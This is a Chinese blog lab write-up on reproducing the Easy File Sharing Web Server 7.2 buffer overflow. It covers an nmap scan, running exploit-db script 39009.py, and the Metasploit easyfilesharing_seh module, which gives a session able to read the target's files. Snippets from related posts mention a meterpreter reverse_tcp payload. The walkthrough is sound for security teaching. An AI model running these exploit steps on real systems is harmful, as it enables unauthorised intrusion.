easy file sharing server

最新推荐文章于 2024-04-25 21:00:28 发布
最新推荐文章于 2024-04-25 21:00:28 发布
阅读量495 收藏 7
点赞数 8
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74398661/article/details/135249700
版权

一,

做一下这个漏洞复现

1.在kali 和Windows这两台虚拟机上做

并且是以NAT模式连接在同一网络

2.先在Windows7虚拟机中安装easy file sharing server

安装之后会出现以下界面,选择try it

可知http服务用的端口为80,服务器ip=192.168.110.130

接下来使用kali

用nmap工具扫描上面的IP  192.168.110.130  

nmap -sV 192.168.110.130

查看各开放端口使用的服务名称和版本号

80端口和443端口

80端口开放

利用漏洞

在kali中访问存在漏洞的服务端口

192.168.110.130 :80

试试正常长度,结果如下

当超出5000字符时,结果无响应

回到win7时,easy file sharing server已经崩溃自动关闭

可见漏洞存在

此处我们的目的是,利用漏洞运行靶机的计算器。对于实现该功能的渗透模块,可以基于Kali Linux系统自带的漏洞库中相关的渗透模块来编写。回到kali中,使用下面的命令查找相关渗透模块:searchsploit easy file sharing

Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)          | windows/remote/39009.py

查阅资料,可知该脚本可以实现再目标计算机执行计算器程序的功能

python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.110.130 80

运行成功,回到win7中查看,关闭之前崩溃的程序,计算器自动打开,复现完成


二、Metasploit应用

在终端输入msfconsole

启动msf之后,找到EasyFileSharing的漏洞利用模块

输入

search EasyFileSharing

选择2015年的利用模块,输入use exploit/windows/http/easyfilesharing_seh

目标靶机还没设置,会报错,再输入show options进行配置

配置目标靶机地址:set RHOSTS+目标靶机ip地址

然后进行模块攻击,输入exploit

这时候就可以用ls查看被控制端的文件了,还可以输入cat+文件名可查看内容

jam409
关注
easy file sharing server 漏洞复现
cheng___yu_的博客
12-14 3277
一、漏洞详情 Easy File Sharing FTP Server 是一款 FTP 服务程序。 Easy File Sharing FTP Server 处理 PASS 命令存在问题,远程攻击者可以利用漏洞进行缓冲区溢出攻击,可能以进程权限执行任意指令。 提交超长字符串作为 PASS 命令参数,可导致触发缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令 二、工具 靶机: 192.168.118.132、win10(把 windows 安全中心关闭)、安装 easy file sharing s
复现easy file sharing server漏洞渗透测试及Metasploit应用
m0_75239462的博客
01-03 509
(二)打开easy file sharing server,在kali终端输入nmap -sV 192.168.5.30命令进行扫描,发现靶机上的8080端口运行着“easy file sharing server”软件,版本为6.9。-o:存放payload.exe的路径,我选择的是把payload.exe下载在root文件夹里,即/root/payload.exe,也可以直接存放在桌面。(四)靶机上运行payload.exe程序 ,返回kali发现在Metasploit中打开了一个session。
Easy File Sharing Server7.2漏洞复现
aarong的博客
11-04 1707
easy file sharing server7.2漏洞复现 漏洞简述 easy file sharing server缓冲区漏洞 实验环境 攻击机:kali linux 靶机:windows(这里我使用的靶机是winsever2003) 配置在同一网络环境下(同网段) 复现过程 (1)首先在靶机中安装easy file sharing server软件 (2)因为靶机有IIS可以占用了80端口,所以在这里设置一下服务部署的端口为8000,点击Restart: (3)打开网站查看是否修改成功 (4)
最好的web文件分享工具Easy File Sharing Web Server
05-26
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架起一个网站,你可以用它来和朋友们分享照片、音乐、视频,还可以让其它用户通过一个简单的网页界面上传自己的收藏到你的PC伤,真正达到分享资源的目的。
Easy File Sharing Web Server 7.2
01-15
Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.
easy file sharing web service 7.2 buffer overflow分析
qq_41252520的博客
06-04 315
测试 【环境】:win7x86,kali 引用网上公布的资料,编写测试脚本。 首先利用msf生成一段pattern,用于后面的问题分析。 msf-pattern_create -l 5800 套用脚本 #!/usr/bin/env python # coding=utf-8 import socket from struct import pack host = '192.168.197.134' port = 80 a = socket.socket() pattern=... a.send("H
Easy File Sharing Web Server 漏洞的简单利用
qq_51302564的博客
12-15 1202
Easy File Sharing Web Server 漏洞的简单利用 个人博客:https://fly-pluche.github.io/posts/Easy%20File%20Sharing%20Web%20Server/ 背景 EFS Easy File Sharing (EFS) Web Server是荷兰EFS Software公司的一套集论坛网站,文件上传、下载、共享和图片共享等功能的文件共享软件。 EFS EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者
Easy file sharing server靶机测试
weixin_54584489的博客
11-14 3673
安装靶机easy file sharing web server 并将port改为8000,按下restart建; 从该靶机界面可知其ip地址为192.168.202.1; 打开kali用nmap扫描一下该ip地址; 从扫描结果可知运行在靶机Easy file sharing web server 上的8000端口确实打开了; 接着利用searchsploit查看靶机存在的漏洞; 右边是测试脚本,左边是漏洞类型,随机选一个漏洞和对应的脚本进行测试 回车 我们会发现...
Easy File Sharing Web Server漏洞复现
m0_73952621的博客
01-03 409
4、在kali中执行python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.228.57 8080。1、在靶机(Win2003)中安装easy file sharing server,端口改为8080,URL为靶机ip。1、利用Nmap扫描发现靶机(Windows)运行了该服务。2、在kali中用nmap -sV扫描靶机IP。2、利用该漏洞,使得靶机运行计算器。打开靶机即可看到计算器被调用了。1、win2003靶机。
easy file sharing web server 复现 + msf被控端与主控端使用
WRplayeR的博客
12-20 525
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。选择使用 exploit/windows/http/easyfilesharing_seh 这个攻击模块。使用命令msfvenom -p windows/meterpreter/reverse_tcp。退出命令行后使用download下载efssetup_20181文件,成功。3、利用该漏洞,使得靶机运行计算器。2、利用Nmap扫描发现靶机(Windows)运行了该服务。
Easy File Sharing Web Server 缓冲区溢出漏洞
qq_55857040的博客
12-14 2213
目录 漏洞介绍 环境准备 复现过程 一、环境搭建 二、漏洞利用 利用漏洞 利用metasploit进行漏洞利用 在kali打开msf控制台 ​ 输入命令,寻找找到EasyFileSharing漏洞的利用模块 小结 漏洞介绍 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进...
easy file sharing server漏洞渗透测试及Metasploit应用
zzzfff__的博客
11-06 498
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。
远程控制(easy file sharing web server)验证性实验
qq_45538874的博客
11-02 496
实验过程 首先在电脑上打开easy file sharing web server 并设置好端口 进入kali中扫描该软件的漏洞 此时,利用39009溢出漏洞进行验证性实验。进入kali中,输入python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.127.1 8000 此时,kali中的渗透模块就会连接到192.168.127.1的8000端口,并将指定代码发送过去 执行完成后,easy file sharing we
Easy File Sharing Server漏洞利用
D000o11的博客
12-03 3074
首先我们用windows系统虚拟机作为靶机并运行easy file sharing server 然后,我们用nmap -sV IP靶机地址扫描端口,可以看到79端口运行了easy file sharing server httpd 6.9: 使用searchsploit Easy File Sharing Web Server寻找可以利用的漏洞脚本。 我们在此使用39009.py文件,用这个漏洞打开靶机上的计算器软件: 可以看到靶机上的计算机已经打开,而且easy f...
漏洞复现Easy File Sharing Web Server 漏洞的简单利用
qq_44655084的博客
12-20 1231
EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者可通过向forum.ghp文件发送恶意的登录请求利用该漏洞执行任意代码。
Easy File Sharing Web Server 7.2 漏洞分析及利用
qq_36811299的博客
08-16 2710
Easy File Sharing Web Server 漏洞
渗透攻击Metasploit
最新发布
2301_78117835的博客
04-25 832
(6)登录凭证后台命令credentials backed command。(5)数据库后台命令database backed command。(4)资源命令resource script command。(2)模块命令module command。(1)核心命令core command。(1)exploit(漏洞渗透模块)(2)payload(攻击载荷模块)(3)auxiliary(辅助模块)(3)任务命令job command。(4)post(后渗透攻击模块)(3)use 使用(某模块)
Easy File Sharing Web Server 7.2 - 'POST' 缓冲区溢出漏洞分析
giantbranch的专栏
07-26 2618
简介看到这个软件,之前不是GET请求缓冲区溢出吗? (附上我的分析链接:http://blog.csdn.net/u012763794/article/details/66970749)这次有个POST,看看有没有新鲜的东西啊!参考:https://www.exploit-db.com/exploits/42165/实验环境 WinXP sp3 中文版 EFS Web Server7.
quick easy ftp server
03-16
"Quick Easy FTP Server" 是一个易于使用的 FTP 服务器软件,可以帮助用户在计算机上建立 FTP 服务器并与其他设备共享文件。 该软件提供了一个简单的用户界面,使得用户可以轻松地配置 FTP 服务器。用户只需要指定共享文件夹的路径、FTP 端口和用户名/密码等信息,就可以启动一个 FTP 服务器并开始共享文件了。 此外,Quick Easy FTP Server 还提供了一些高级功能,例如支持 SSL 加密、IP 过滤和匿名访问等。用户可以根据自己的需要选择启用或禁用这些功能。 总的来说,Quick Easy FTP Server 是一个功能强大而易于使用的 FTP 服务器软件,适合那些需要在本地网络中共享文件的用户使用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值